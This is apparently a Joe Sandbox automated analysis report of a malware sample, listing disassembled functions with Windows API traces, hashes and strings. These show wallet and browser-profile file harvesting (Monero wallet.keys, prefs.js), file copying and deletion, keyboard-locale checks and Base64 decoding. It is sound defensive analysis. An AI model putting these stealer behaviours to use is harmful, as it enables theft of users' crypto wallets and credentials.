                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: prefs.js
                            • API String ID: 3334442632-3783873740
                            • Opcode ID: e6685d3f6784f6be6fcd1d2510057626462d588851e8cf3e72dd0db8137c67f4
                            • Instruction ID: 1c44c783e69bb9c2f3720ef5d95e169c1877baf2afa03de4eb2c18990f5959ea
                            • Opcode Fuzzy Hash: e6685d3f6784f6be6fcd1d2510057626462d588851e8cf3e72dd0db8137c67f4
                            • Instruction Fuzzy Hash: 65B164719402089BDB68FFA0DC95FEE777ABF94340F0085ACA50A961C1EF345B49CB96
                            Function 005F16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0061510C,?,?,?,006151B4,?,?,00000000,?,00000000), ref: 005F1923
                            • StrCmpCA.SHLWAPI(?,0061525C), ref: 005F1973
                            • StrCmpCA.SHLWAPI(?,00615304), ref: 005F1989
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005F1D40
                            • DeleteFileA.KERNEL32(00000000), ref: 005F1DCA
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 005F1E20
                            • FindClose.KERNEL32(000000FF), ref: 005F1E32
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 1415058207-1173974218
                            • Opcode ID: 0a806340ef29f566472d4517f5f646cd6bf68c8b65e5bfb167e68b2047037b83
                            • Instruction ID: fe1439b1c65615fe1994e57974253510900bcabd316422f85cdd6370f608cb58
                            • Opcode Fuzzy Hash: 0a806340ef29f566472d4517f5f646cd6bf68c8b65e5bfb167e68b2047037b83
                            • Instruction Fuzzy Hash: E8122D719512189ADB9DFBA0CC96EEF737AAF54340F40819DA10A620D1EF306F89CF95
                            Function 005FDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00610C2E), ref: 005FDE5E
                            • StrCmpCA.SHLWAPI(?,006114C8), ref: 005FDEAE
                            • StrCmpCA.SHLWAPI(?,006114CC), ref: 005FDEC4
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 005FE3E0
                            • FindClose.KERNEL32(000000FF), ref: 005FE3F2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                            • String ID: \*.*
                            • API String ID: 2325840235-1173974218
                            • Opcode ID: 6b6f098f4aac33e10d5feace2f18e1a66c221906db32c3ce77d57a01dd96a929
                            • Instruction ID: 70d9de8ff593a950d947e909c95416225d60e3bcf2577ad76defbd7cf3cc3613
                            • Opcode Fuzzy Hash: 6b6f098f4aac33e10d5feace2f18e1a66c221906db32c3ce77d57a01dd96a929
                            • Instruction Fuzzy Hash: DBF1BF719602189ADB9DEBA0CC96EEF733ABF54340F40419DA50A620D1EF346F89CF56
                            Function 005FDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006114B0,00610C2A), ref: 005FDAEB
                            • StrCmpCA.SHLWAPI(?,006114B4), ref: 005FDB33
                            • StrCmpCA.SHLWAPI(?,006114B8), ref: 005FDB49
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 005FDDCC
                            • FindClose.KERNEL32(000000FF), ref: 005FDDDE
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID:
                            • API String ID: 3334442632-0
                            • Opcode ID: 74974933681d096f2f3c9bb84fedfbf80a3263934da073fe3a0a4bdb04973b55
                            • Instruction ID: 686499fc5423dc8db2586adb349235e65a60c0f31bb7dfbd20fed8ef286d2154
                            • Opcode Fuzzy Hash: 74974933681d096f2f3c9bb84fedfbf80a3263934da073fe3a0a4bdb04973b55
                            • Instruction Fuzzy Hash: A091557290020897CB58FBB0DC56DFE777EBBD4340F40866CB90696181EE349B498BA6
                            Function 00607B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                            • GetKeyboardLayoutList.USER32(00000000,00000000,006105AF), ref: 00607BE1
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00607BF9
                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 00607C0D
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00607C62
                            • LocalFree.KERNEL32(00000000), ref: 00607D22
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            • Opcode ID: 88eb0ff0ec681df5918cafb035b8209ed4c1402fc1398b78a1385e2ffb96f5a8
                            • Instruction ID: 499406552e776cdec4ad753ac4e6c8adc22c45a6a232760b1002985b2b4802c2
                            • Opcode Fuzzy Hash: 88eb0ff0ec681df5918cafb035b8209ed4c1402fc1398b78a1385e2ffb96f5a8
                            • Instruction Fuzzy Hash: C3416C71980218ABDB68DB94DC89BEEB379FF44700F204199E009622D1DB342F86CFA5
                            Function 009CAAC7 Relevance: 10.4, Strings: 7, Instructions: 1662COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 'na$8U^w$Kqw~$Slc>$XH{n$w8W~$4WS
                            • API String ID: 0-3283391380
                            • Opcode ID: a18fe8ff763688ad135bf57bdd6ff6ee3b3344badd8af2e74e619c26afec73e4
                            • Instruction ID: bb6a62a3c52d30537c39f1ce9e7668baa13561fa0504d3a22d02ec2ac7e3a5bc
                            • Opcode Fuzzy Hash: a18fe8ff763688ad135bf57bdd6ff6ee3b3344badd8af2e74e619c26afec73e4
                            • Instruction Fuzzy Hash: FDB2F7F3A082049FE304AE2DEC8577ABBE9EF94320F1A493DE6C5C7744E63558058697
                            Function 005FE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00610D73), ref: 005FE4A2
                            • StrCmpCA.SHLWAPI(?,006114F8), ref: 005FE4F2
                            • StrCmpCA.SHLWAPI(?,006114FC), ref: 005FE508
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 005FEBDF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 433455689-1173974218
                            • Opcode ID: 84976e58f3a479be5cdf993c285cd0240bf381381868c02f8471ca8019a3808b
                            • Instruction ID: e6abeaab43501fdcd26e2c6bb24826f37fe344c6a5be2ec25276d67058121ac0
                            • Opcode Fuzzy Hash: 84976e58f3a479be5cdf993c285cd0240bf381381868c02f8471ca8019a3808b
                            • Instruction Fuzzy Hash: 7C1282719502089ADB9CFBA0DC96EEF733AAF94340F40859CB50A560D1EF346F49CB96
                            Function 009B9D29 Relevance: 9.2, Strings: 6, Instructions: 1679COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: (w;$c+yy$lIzv$r!~s$~Vi/$Xgy
                            • API String ID: 0-2706887180
                            • Opcode ID: a6563f835944a64bd03b191799adeba5ebf3941ba32f7808e52518b423db11e5
                            • Instruction ID: d41f5498ba341c773c1702432ad23c3813d4521b12751cd654d6608e1d168fde
                            • Opcode Fuzzy Hash: a6563f835944a64bd03b191799adeba5ebf3941ba32f7808e52518b423db11e5
                            • Instruction Fuzzy Hash: 70B23AF3A0C2049FE304AE2DEC8577AB7D9EF94320F1A853DEAC5C7744EA3558058696
                            Function 009CE1B7 Relevance: 9.1, Strings: 6, Instructions: 1609COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: #]}$3{g$4I?$B]w$SNW$qzo
                            • API String ID: 0-3843887360
                            • Opcode ID: 0b0fd1ea5cb0cb7cc599caa35c961438469e018faea54e36ef4ded48122056ef
                            • Instruction ID: cdadbfb19d69806d82b7ff5ba4807b138c8f54f19c80b6d77901f1ae55cc030d
                            • Opcode Fuzzy Hash: 0b0fd1ea5cb0cb7cc599caa35c961438469e018faea54e36ef4ded48122056ef
                            • Instruction Fuzzy Hash: C6B2F7F360C2009FE3046E2DEC8577ABBE9EF94720F1A453DEAC4C7744EA3598058696
                            Function 005F9AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N_,00000000,00000000), ref: 005F9AEF
                            • LocalAlloc.KERNEL32(00000040,?,?,?,005F4EEE,00000000,?), ref: 005F9B01
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N_,00000000,00000000), ref: 005F9B2A
                            • LocalFree.KERNEL32(?,?,?,?,005F4EEE,00000000,?), ref: 005F9B3F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID: N_
                            • API String ID: 4291131564-1897904754
                            • Opcode ID: c94c30d083869b0787ffe160a6764720acd37152f7b650fbd240b3542d1caac8
                            • Instruction ID: 0a41d5511301e94e9faf63189064f20a97ed5dd8a543ed8373d391cdab9a07ab
                            • Opcode Fuzzy Hash: c94c30d083869b0787ffe160a6764720acd37152f7b650fbd240b3542d1caac8
                            • Instruction Fuzzy Hash: 5E11A2B8240208AFEB14CF64DC95FAA77B5FB89700F208458FE159B3D0C7B6A901CB90
                            Function 009C5AAB Relevance: 7.8, Strings: 5, Instructions: 1543COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
